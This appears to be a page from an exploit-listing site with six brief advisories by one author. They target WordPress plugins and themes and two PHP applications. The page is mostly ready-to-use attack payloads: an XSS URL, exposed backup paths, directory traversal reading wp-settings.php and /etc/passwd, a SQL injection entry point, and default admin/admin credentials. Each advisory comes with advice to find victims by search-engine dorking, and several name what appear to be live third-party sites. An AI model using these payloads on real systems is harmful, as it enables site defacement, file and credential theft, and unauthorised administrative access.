Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://kingcomposer.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee>Hacked by indoushka</marquee> [+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee>Hacked by indoushka</marquee> Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress - Duplicator 3.8.7 Backup Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | | # Vendor : https://snapcreek.com/duplicator/docs/changelog/ | | # Dork : "/wp-content/backups-dup-pro/" | ==================================================================================================================================== P0C : [+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations. [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : "/wp-content/backups-dup-pro/" [+] https://127.0.0.1/pfauen.de/wp-content/backups-dup-pro/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Wordpress KAP-theme v2.0 Directory Traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://graphicriver.net/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /wp-content/themes/kap/download.php?url=../../../../../../../../../home/kingaport/public_html/wp-settings.php download.php <?php $file_url = $_GET['url']; header('Content-Type: application/octet-stream'); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\""); readfile($file_url); ?> [+] http://127.0.0.1Nokingabdullahportcomsa/wp-content/themes/kap/download.php?url=../../../../../../../../../home/kingaport/public_html/wp-settings.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress Oxygen-Theme v7.8 Directory Traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://themeforest.net/item/oxygen-woocommerce-wordpress-theme/7851484 | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /wp-content/themes/oxygen-theme/download.php?file=../../../../../../../../../etc/passwd [+] http://127.0.0.1/wp-content/themes/oxygen-theme/download.php?file=../../../../../../../../../etc/passwd Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>====================================================================================================================================== | # Title : CMSgrafia v7 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https://www.infografiaweb.com/ | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] inject here : http://www127.0.0.1/riveimportltdcom/pagina.php?idcate=3 [+] Panel : /administrador/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Cloud Base Multiple school Generate & Management System v4.6.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://codecanyon.net/item/cloud-base-multiple-school-generate-management-system/22968587?s_rank=166 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] Use Backdoor Account : admin / admin [+] Panel : http://127.0.0.1/fatafatidiscountcom/user Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>